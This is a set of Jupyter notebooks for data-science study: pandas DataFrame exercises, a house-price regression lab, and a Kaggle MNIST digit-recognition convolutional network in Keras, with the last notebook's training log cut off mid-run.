], [ "df = df.drop('k')\ndf", "_____no_output_____" ] ], [ [ "#### sort the DataFrame first by 'name' in descending order, then by 'score' in ascending order", "_____no_output_____" ] ], [ [ "df.sort_values(by=['name', 'score'], ascending=[False, True])", "_____no_output_____" ] ], [ [ "#### replace the 'qualify' column contains the values 'yes' and 'no' with True and False", "_____no_output_____" ] ], [ [ "print(\"\\nReplace the 'qualify' column contains the values 'yes' and 'no' with True and False:\")\ndf['qualify'] = df['qualify'].map({'yes': True, 'no': False})\ndf", "\nReplace the 'qualify' column contains the values 'yes' and 'no' with True and False:\n" ] ], [ [ "#### change the name 'James' to 'Suresh' in name column of the DataFrame", "_____no_output_____" ] ], [ [ "df['name'] = df['name'].replace('James', 'Suresh')\ndf", "_____no_output_____" ] ], [ [ "#### delete the 'attempts' column from the DataFrame", "_____no_output_____" ] ], [ [ "df.pop('attempts')\ndf", "_____no_output_____" ] ], [ [ "#### insert a new column in existing DataFrame", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\nlabels = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']\ndf = pd.DataFrame(exam_data , index=labels)\ndf", "_____no_output_____" ], [ "color = ['Red','Blue','Orange','Red','White','White','Blue','Green','Green','Red']\ndf['color'] = color\ndf", "_____no_output_____" ] ], [ [ "#### iterate over rows in a DataFrame", "_____no_output_____" ] ], [ [ "for index, row in df.iterrows():\n print(row['name'], row['score'])", "Anastasia 12.5\nDima 9.0\nKatherine 16.5\nJames nan\nEmily 9.0\nMichael 20.0\nMatthew 14.5\nLaura nan\nKevin 8.0\nJonas 19.0\n" ] ], [ [ "#### get list from DataFrame column headers", "_____no_output_____" ] ], [ [ "list(df.columns.values)", "_____no_output_____" ] ], [ [ "#### rename columns of a given DataFrame", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 2, 3], 'col2': [4, 5, 6], 'col3': [7, 8, 9]}\ndf = pd.DataFrame(data=d)\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "df.columns = ['Column1', 'Column2', 'Column3']\ndf = df.rename(columns={'col1': 'Column1', 'col2': 'Column2', 'col3': 'Column3'})\nprint(\"New DataFrame after renaming columns:\")\ndf", "New DataFrame after renaming columns:\n" ] ], [ [ "#### select rows from a given DataFrame based on values in some columns", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 4, 3, 4, 5], 'col2': [4, 5, 6, 7, 8], 'col3': [7, 8, 9, 0, 1]}\ndf = pd.DataFrame(data=d)\ndf", "_____no_output_____" ], [ "df.loc[df['col1'] == 4]", "_____no_output_____" ] ], [ [ "#### change the order of a DataFrame columns", "_____no_output_____" ] ], [ [ "df[['col3', 'col2', 'col1']]", "_____no_output_____" ] ], [ [ "#### add one row in an existing DataFrame", "_____no_output_____" ] ], [ [ "df2 = {'col1': 10, 'col2': 11, 'col3': 12}\ndf = df.append(df2, ignore_index=True)\ndf", "_____no_output_____" ] ], [ [ "#### count city wise number of people from a given of data set", "_____no_output_____" ] ], [ [ "\ndf1 = pd.DataFrame({'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n'city': ['California', 'Los Angeles', 'California', 'California', 'California', 'Los Angeles', 'Los Angeles', 'Georgia', 'Georgia', 'Los Angeles']})\ng1 = df1.groupby([\"city\"]).size().reset_index(name='Number of people')\ng1\n", "_____no_output_____" ] ], [ [ "#### delete DataFrame row(s) based on given column value", "_____no_output_____" ] ], [ [ "df = df[df.col2 != 5]\nprint(\"New DataFrame\")\ndf", "New DataFrame\n" ] ], [ [ "#### widen output display to see more columns", "_____no_output_____" ] ], [ [ "pd.set_option('display.max_rows', 50)\npd.set_option('display.max_columns', 50)\npd.set_option('display.width', 200)\ndf", "_____no_output_____" ] ], [ [ "#### select a row of series/dataframe by given integer index", "_____no_output_____" ] ], [ [ "result = df.iloc[[2]]\nprint(\"Index-2: Details\")\nresult", "Index-2: Details\n" ] ], [ [ "#### replace all the NaN values with Zero's in a column of a dataframe", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\n\ndf", "_____no_output_____" ], [ "df = df.fillna(0)\ndf", "_____no_output_____" ] ], [ [ "#### convert index in a column of the given dataframe.", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\ndf.reset_index(level=0, inplace=True)\ndf", "_____no_output_____" ], [ "df.loc[0]", "_____no_output_____" ] ], [ [ "#### set a given value for particular cell in DataFrame using index value", "_____no_output_____" ] ], [ [ "df", "_____no_output_____" ], [ "print(\"\\nSet a given value for particular cell in the DataFrame\")\n\ndf.at[8,'score']=100\ndf\n", "\nSet a given value for particular cell in the DataFrame\n" ] ], [ [ "#### count the NaN values in one or more columns in DataFrame", "_____no_output_____" ] ], [ [ "df.isnull().values.sum()", "_____no_output_____" ] ], [ [ "#### drop a list of rows from a specified DataFrame", "_____no_output_____" ] ], [ [ "df = df.drop(df.index[[2,4]])\ndf", "_____no_output_____" ] ], [ [ "#### reset index in a given DataFrame.", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\n\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "print(\"\\nAfter removing first and second rows\")\ndf = df.drop([0, 1])\ndf", "\nAfter removing first and second rows\n" ], [ "print(\"\\nReset the Index:\")\ndf = df.reset_index()\ndf", "\nReset the Index:\n" ] ], [ [ "#### devide a DataFrame in a given ratio", "_____no_output_____" ] ], [ [ "s1 = pd.Series(['100', '200', 'python', '300.12', '400'])\ns2 = pd.Series(['10', '20', 'php', '30.12', '40'])\nprint(\"Data Series:\")\ns1", "Data Series:\n" ], [ "s2", "_____no_output_____" ], [ "df = pd.concat([s1, s2], axis=1)\nprint(\"New DataFrame combining two series:\")\ndf", "New DataFrame combining two series:\n" ] ], [ [ "#### shuffle a given DataFrame rows", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\ndf", "_____no_output_____" ], [ "# 从对象轴返回随机的项目样本。\n\ndf = df.sample(frac=1)\ndf", "_____no_output_____" ] ], [ [ "#### 41. Write a Pandas program to convert DataFrame column type from string to datetime.\n", "_____no_output_____" ] ], [ [ "s = pd.Series(['3/11/2000', '3/12/2000', '3/13/2000'])\ns", "_____no_output_____" ], [ "r = pd.to_datetime(pd.Series(s))\ndf = pd.DataFrame(r)\ndf", "_____no_output_____" ] ], [ [ "#### 42. Write a Pandas program to rename a specific column name in a given DataFrame.", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 2, 3], 'col2': [4, 5, 6], 'col3': [7, 8, 9]}\ndf = pd.DataFrame(data=d)\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "df=df.rename(columns = {'col2':'Column2'})\nlist(df.columns)", "_____no_output_____" ] ], [ [ "#### get a list of a specified column of a DataFrame.", "_____no_output_____" ] ], [ [ "lst = df[\"col1\"].tolist()\nlst", "_____no_output_____" ] ], [ [ "#### get the specified row value of a given DataFrame", "_____no_output_____" ] ], [ [ "print(\"Value of Row1\")\ndf.iloc[0]", "Value of Row1\n" ], [ "print(\"Value of Row4\")\ndf.iloc[2]", "Value of Row4\n" ] ], [ [ "#### get the datatypes of columns of a DataFrame", "_____no_output_____" ] ], [ [ "df.dtypes", "_____no_output_____" ] ], [ [ "#### append data to an empty DataFrame", "_____no_output_____" ] ], [ [ "df = pd.DataFrame()\ndata = pd.DataFrame({\"col1\": range(3),\"col2\": range(3)})\nprint(\"After appending some data:\")\ndf = df.append(data)\ndf", "After appending some data:\n" ] ], [ [ "#### convert the datatype of a given column ", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9.1, 16.5, 12.77, 9.21, 20.22, 14.5, 11.34, 8.8, 19.13],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\ndf", "_____no_output_____" ], [ "df.dtypes", "_____no_output_____" ], [ "df.score = df.score.astype(int)\ndf.dtypes", "_____no_output_____" ] ], [ [ "#### group by the first column and get second column as lists in rows.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame( {'col1':['C1','C1','C2','C2','C2','C3','C2'], 'col2':[1,2,3,3,4,6,5]})\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "df = df.groupby('col1')['col2'].apply(list)\ndf", "_____no_output_____" ] ], [ [ "#### Write a Pandas program to select all columns, except one given column in a DataFrame.", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 2, 3, 4, 7], 'col2': [4, 5, 6, 9, 5], 'col3': [7, 8, 12, 1, 11]}\ndf = pd.DataFrame(data=d)\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "print(\"\\nAll columns except 'col3':\")\ndf = df.loc[:, df.columns != 'col3']\ndf", "\nAll columns except 'col3':\n" ] ], [ [ "#### Write a Pandas program to get topmost n records within each group of a DataFrame.", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 2, 3, 4, 7, 11], 'col2': [4, 5, 6, 9, 5, 0], 'col3': [7, 5, 8, 12, 1,11]}\ndf = pd.DataFrame(data=d)\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "print(\"\\ntopmost n records within each group of a DataFrame:\")\ndf1 = df.nlargest(2, 'col1')\ndf1", "\ntopmost n records within each group of a DataFrame:\n" ], [ "df2 = df.nlargest(3, 'col2')\ndf2", "_____no_output_____" ], [ "df3 = df.nlargest(3, 'col3')\ndf3", "_____no_output_____" ] ], [ [ "#### Write a Pandas program to add a prefix or suffix to all columns of a given DataFrame.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({'W':[68,75,86,80,66],'X':[78,85,96,80,86], 'Y':[84,94,89,83,86],'Z':[86,97,96,72,83]});\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "print(\"\\nAdd prefix:\")\ndf.add_prefix(\"A_\")", "\nAdd prefix:\n" ], [ "print(\"\\nAdd suffix:\")\ndf.add_suffix(\"_1\")", "\nAdd suffix:\n" ] ], [ [ "#### Write a Pandas program to select columns by data type of a given DataFrame", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({\n 'name': ['Alberto Franco','Gino Mcneill','Ryan Parkes', 'Eesha Hinton', 'Syed Wharton'],\n 'date_of_birth': ['17/05/2002','16/02/1999','25/09/1998','11/05/2002','15/09/1997'],\n 'age': [18.5, 21.2, 22.5, 22, 23]\n})\n\ndf", "_____no_output_____" ], [ "print(\"\\nSelect numerical columns\")\ndf.select_dtypes(include = \"number\")", "\nSelect numerical columns\n" ], [ "print(\"\\nSelect string columns\")\ndf.select_dtypes(include = \"object\")", "\nSelect string columns\n" ] ], [ [ "#### Write a Pandas program to rename all columns with the same pattern of a given DataFrame.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({\n 'Name': ['Alberto Franco','Gino Mcneill','Ryan Parkes', 'Eesha Hinton', 'Syed Wharton'],\n 'Date_Of_Birth ': ['17/05/2002','16/02/1999','25/09/1998','11/05/2002','15/09/1997'],\n 'Age': [18.5, 21.2, 22.5, 22, 23]\n})\n\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "df.columns = df.columns.str.lower().str.rstrip()\nprint(\"\\nRemove trailing (at the end) whitesapce and convert to lowercase of the columns name\")\ndf.head()", "\nRemove trailing (at the end) whitesapce and convert to lowercase of the columns name\n" ] ], [ [ "#### Write a Pandas program to merge datasets and check uniqueness.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({\n 'Name': ['Alberto Franco','Gino Mcneill','Ryan Parkes', 'Eesha Hinton', 'Syed Wharton'],\n 'Date_Of_Birth ': ['17/05/2002','16/02/1999','25/09/1998','11/05/2002','15/09/1997'],\n 'Age': [18.5, 21.2, 22.5, 22, 23]\n})\nprint(\"Original DataFrame:\")\nprint(df)\ndf1 = df.copy(deep = True)\ndf = df.drop([0, 1])\ndf1 = df1.drop([2])\nprint(\"\\nNew DataFrames:\")\nprint(df)\nprint(df1)", "Original DataFrame:\n Name Date_Of_Birth Age\n0 Alberto Franco 17/05/2002 18.5\n1 Gino Mcneill 16/02/1999 21.2\n2 Ryan Parkes 25/09/1998 22.5\n3 Eesha Hinton 11/05/2002 22.0\n4 Syed Wharton 15/09/1997 23.0\n\nNew DataFrames:\n Name Date_Of_Birth Age\n2 Ryan Parkes 25/09/1998 22.5\n3 Eesha Hinton 11/05/2002 22.0\n4 Syed Wharton 15/09/1997 23.0\n Name Date_Of_Birth Age\n0 Alberto Franco 17/05/2002 18.5\n1 Gino Mcneill 16/02/1999 21.2\n3 Eesha Hinton 11/05/2002 22.0\n4 Syed Wharton 15/09/1997 23.0\n" ], [ "print('\\n\"one_to_one”: check if merge keys are unique in both left and right datasets:\"')\ndf_one_to_one = pd.merge(df, df1, validate = \"one_to_one\")\ndf_one_to_one", "\n\"one_to_one”: check if merge keys are unique in both left and right datasets:\"\n" ], [ "print('\\n\"one_to_many” or “1:m”: check if merge keys are unique in left dataset:')\ndf_one_to_many = pd.merge(df, df1, validate = \"one_to_many\")\ndf_one_to_many", "\n\"one_to_many” or “1:m”: check if merge keys are unique in left dataset:\n" ], [ "print('“many_to_one” or “m:1”: check if merge keys are unique in right dataset:')\ndf_many_to_one = pd.merge(df, df1, validate = \"many_to_one\")\ndf_many_to_one", "“many_to_one” or “m:1”: check if merge keys are unique in right dataset:\n" ] ], [ [ "#### Write a Pandas program to convert continuous values of a column in a given DataFrame to categorical.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({\n 'name': ['Alberto Franco','Gino Mcneill','Ryan Parkes', 'Eesha Hinton', 'Syed Wharton', 'Kierra Gentry'],\n 'age': [18, 22, 85, 50, 80, 5]\n})\n\ndf", "_____no_output_____" ], [ "df[\"age_groups\"] = pd.cut(df[\"age\"], bins = [0, 18, 65, 99], labels = [\"kids\", \"adult\", \"elderly\"])\ndf", "_____no_output_____" ] ], [ [ "#### Write a Pandas program to combine many given series to create a DataFrame.", "_____no_output_____" ] ], [ [ "sr1 = pd.Series(['php', 'python', 'java', 'c#', 'c++'])\nsr2 = pd.Series([1, 2, 3, 4, 5])\nsr1", "_____no_output_____" ], [ "sr2", "_____no_output_____" ], [ "print(\"\\nUsing pandas concat:\")\nser_df = pd.concat([sr1, sr2], axis = 1)\nser_df", "\nUsing pandas concat:\n" ], [ "ser_df = pd.DataFrame({\"col1\":sr1, \"col2\":sr2})\nser_df", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]
e72e59b04d8c6ad118978279605c2a71bb0aa683
19,816
ipynb
Jupyter Notebook
lab12.ipynb
kendallsmith327/IA-241
7c1492ff635249849c20c083b5d7fc0518c1ab8a
[ "MIT" ]
null
null
null
lab12.ipynb
kendallsmith327/IA-241
7c1492ff635249849c20c083b5d7fc0518c1ab8a
[ "MIT" ]
null
null
null
lab12.ipynb
kendallsmith327/IA-241
7c1492ff635249849c20c083b5d7fc0518c1ab8a
[ "MIT" ]
null
null
null
27.753501
99
0.372275
[ [ [ "# Lab 12. Data Analysis in Python", "_____no_output_____" ], [ "## load data into pandas.dataframe", "_____no_output_____" ] ], [ [ "import pandas", "_____no_output_____" ], [ "df = pandas.read_excel('s3://ksmithia241-2021spring/house_price.xls')\ndf[:10]", "_____no_output_____" ] ], [ [ "## 2.1 unit price", "_____no_output_____" ] ], [ [ "df['unit_price']=df['price']/df['area']\ndf[:10]", "_____no_output_____" ] ], [ [ "## 2.2 house type", "_____no_output_____" ] ], [ [ "df['house_type'].value_counts()", "_____no_output_____" ] ], [ [ "## 2.3 average price more than two bathrooms", "_____no_output_____" ] ], [ [ "prc_more_2_bath=df.loc[ df ['bathroom']>2 ]['price']\n\nprint('avg price of houses more than 2 bathrooms is ${}'.format(prc_more_2_bath.mean()))", "avg price of houses more than 2 bathrooms is $383645.45454545453\n" ] ], [ [ "## 2.4 mean/median unit price", "_____no_output_____" ] ], [ [ "print('mean unit price is ${}'.format(df['unit_price'].mean()))", "mean unit price is $167.45934522134766\n" ], [ "print('median unit price is ${}'.format(df['unit_price'].median()))", "median unit price is $130.13392857142858\n" ] ], [ [ "## 2.5 avg price per house type", "_____no_output_____" ] ], [ [ "df.groupby('house_type').mean()['price']", "_____no_output_____" ] ], [ [ "## 2.6 predict price by house area", "_____no_output_____" ] ], [ [ "from scipy import stats", "_____no_output_____" ], [ "result = stats.linregress(df['area'],df['price'])", "_____no_output_____" ], [ "print('slope is {}'.format(result.slope))\nprint('intercept is {}'.format(result.intercept))\nprint('r square is {}'.format(result.rvalue*result.rvalue))\nprint('p value is {}'.format(result.pvalue))", "slope is 79.95495729411489\nintercept is 156254.76245096227\nr square is 0.2343900121890692\np value is 0.001340065037461188\n" ] ], [ [ "## 2.7 predict price of house 2,000 sqft", "_____no_output_____" ] ], [ [ "print('price of a house with {} sqft is ${}'.format(2000,2000*result.slope+result.intercept))", "price of a house with 2000 sqft is $316164.67703919206\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ] ]
e72e5ec45e8c6cf1d540be077d7f9fbfd64eae48
121,271
ipynb
Jupyter Notebook
digit_recognizer.ipynb
attaullahshafiq10/digit-recognizer
9457666ebe863ef13426472ce107ab1f027ac359
[ "MIT" ]
1
2021-04-03T09:47:12.000Z
2021-04-03T09:47:12.000Z
digit_recognizer.ipynb
attaullahshafiq10/digit-recognizer
9457666ebe863ef13426472ce107ab1f027ac359
[ "MIT" ]
null
null
null
digit_recognizer.ipynb
attaullahshafiq10/digit-recognizer
9457666ebe863ef13426472ce107ab1f027ac359
[ "MIT" ]
null
null
null
40.983778
6,750
0.373643
[ [ [ "<a href=\"https://colab.research.google.com/github/komalaftab/kaggle_Competitions/blob/master/digit_recognizer.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "**Objective**", "_____no_output_____" ], [ "**Learn computer vision fundamentals with the famous MNIST data**", "_____no_output_____" ], [ "**importing libraries**", "_____no_output_____" ], [ "\n\n1. data load\n2. data preparation\n* Normalization\n* reshape\n* label encoding\n* spliting training and validation \n3. introduction to convents\n4. saving submission file\n\n\n\n\n\n\n\n\n\n", "_____no_output_____" ] ], [ [ "import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport seaborn as sns\nnp.random.seed(2)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nimport itertools\n\nfrom keras.utils.np_utils import to_categorical # convert to one-hot-encoding\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\nfrom keras.optimizers import RMSprop\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ReduceLROnPlateau\n", "Using TensorFlow backend.\n" ] ], [ [ "**load_Data**", "_____no_output_____" ] ], [ [ "# loading data \ntrain_data = pd.read_csv(\"train.csv\")\ntest_data = pd.read_csv(\"test.csv\")\n", "_____no_output_____" ], [ "# display first five rows of train_data\ntrain_data.head()", "_____no_output_____" ], [ "test_data.head()", "_____no_output_____" ], [ "# checking shape of train_data\ntrain_data.shape # \n", "_____no_output_____" ], [ "# checking shape of test_data\n\ntest_data.shape", "_____no_output_____" ] ], [ [ "**Check for null and missing values**", "_____no_output_____" ] ], [ [ "# check the data\ntrain_data.describe()", "_____no_output_____" ], [ "# check missing and null values\ntest_data.isnull().sum()", "_____no_output_____" ], [ "train_data.isnull().sum()", "_____no_output_____" ], [ "Y_train = train_data[\"label\"]\n\n# Drop 'label' column\nX_train = train_data.drop(labels = [\"label\"],axis = 1) \n\n# free some space\ndel train_data \n\ng = sns.countplot(Y_train)\n\nY_train.value_counts()", "_____no_output_____" ] ], [ [ "There is no missing values in the train and test dataset. So we can safely go ahead.", "_____no_output_____" ], [ "**Normalization**", "_____no_output_____" ], [ "We perform a grayscale normalization to reduce the effect of illumination's differences.\n\nMoreover the CNN converg faster on [0..1] data than on [0..255].", "_____no_output_____" ] ], [ [ "# Normalize the data\nX_train= X_train / 255.0\ntest_data= test_data / 255.0", "_____no_output_____" ] ], [ [ "**Reshape**", "_____no_output_____" ] ], [ [ "# Reshape image in 3 dimensions (height = 28px, width = 28px , channel = 1)\nX_train = X_train.values.reshape((-1,28,28,1))\ntest_data = test_data.values.reshape((-1,28,28,1))", "_____no_output_____" ], [ "test_data.shape", "_____no_output_____" ] ], [ [ "**label_encoding**", "_____no_output_____" ] ], [ [ "# Encode labels to one hot vectors (ex : 2 -> [0,0,1,0,0,0,0,0,0,0])\nY_train = to_categorical(Y_train, num_classes = 10)\n", "_____no_output_____" ] ], [ [ "**Split training and valdiation set**", "_____no_output_____" ] ], [ [ "# Set the random seed\nrandom_seed = 2", "_____no_output_____" ], [ "# Split the train and the validation set for the fitting\nX_train, X_val, Y_train, Y_val = train_test_split(X_train, Y_train, test_size = 0.1, random_state=random_seed)", "_____no_output_____" ] ], [ [ " i choosed to split the train set in two parts : a small fraction (10%) became the validation set which the model is evaluated and the rest (90%) is used to train the model.", "_____no_output_____" ] ], [ [ "# Some examples\nimport matplotlib.pyplot as plt\n\nh = plt.imshow(X_train[0][:,:,0])", "_____no_output_____" ], [ "k = plt.imshow(X_train[10][:,:,0])", "_____no_output_____" ] ], [ [ "**Introduction to convnets**", "_____no_output_____" ] ], [ [ "from tensorflow.keras import layers\nfrom tensorflow.keras import models\n\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))", "_____no_output_____" ] ], [ [ "Let’s display the architecture of the convnet so far.", "_____no_output_____" ] ], [ [ "model.summary()", "Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d (Conv2D) (None, 26, 26, 32) 320 \n_________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 13, 13, 32) 0 \n_________________________________________________________________\nconv2d_1 (Conv2D) (None, 11, 11, 64) 18496 \n_________________________________________________________________\nmax_pooling2d_1 (MaxPooling2 (None, 5, 5, 64) 0 \n_________________________________________________________________\nconv2d_2 (Conv2D) (None, 3, 3, 64) 36928 \n=================================================================\nTotal params: 55,744\nTrainable params: 55,744\nNon-trainable params: 0\n_________________________________________________________________\n" ] ], [ [ "**Adding a classifier on top of the convnet**", "_____no_output_____" ] ], [ [ "model.add(layers.Flatten())\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(10, activation='softmax'))", "_____no_output_____" ] ], [ [ "We’ll do 10-way classification, using a final layer with 10 outputs and a softmax activation.\nHere’s what the network looks like now", "_____no_output_____" ] ], [ [ "model.summary()", "Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d (Conv2D) (None, 26, 26, 32) 320 \n_________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 13, 13, 32) 0 \n_________________________________________________________________\nconv2d_1 (Conv2D) (None, 11, 11, 64) 18496 \n_________________________________________________________________\nmax_pooling2d_1 (MaxPooling2 (None, 5, 5, 64) 0 \n_________________________________________________________________\nconv2d_2 (Conv2D) (None, 3, 3, 64) 36928 \n_________________________________________________________________\nflatten (Flatten) (None, 576) 0 \n_________________________________________________________________\ndense (Dense) (None, 64) 36928 \n_________________________________________________________________\ndense_1 (Dense) (None, 10) 650 \n=================================================================\nTotal params: 93,322\nTrainable params: 93,322\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "# Define the optimizer\n#optimizer = rmsprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)", "_____no_output_____" ], [ "learning_rate_reduction = ReduceLROnPlateau(monitor='val_acc', \n patience=3, \n verbose=1, \n factor=0.5, \n min_lr=0.00001)", "_____no_output_____" ], [ "model.compile(optimizer='rmsprop',loss='categorical_crossentropy',metrics=['accuracy'])\nmodel.fit(X_train, Y_train, epochs=30, batch_size=40)", "Train on 37800 samples\nEpoch 1/30\n37800/37800 [==============================] - 35s 925us/sample - loss: 0.1917 - accuracy: 0.9388\nEpoch 2/30\n37800/37800 [==============================] - 34s 911us/sample - loss: 0.0513 - accuracy: 0.9834\nEpoch 3/30\n37800/37800 [==============================] - 34s 910us/sample - loss: 0.0363 - accuracy: 0.9887\nEpoch 4/30\n37800/37800 [==============================] - 34s 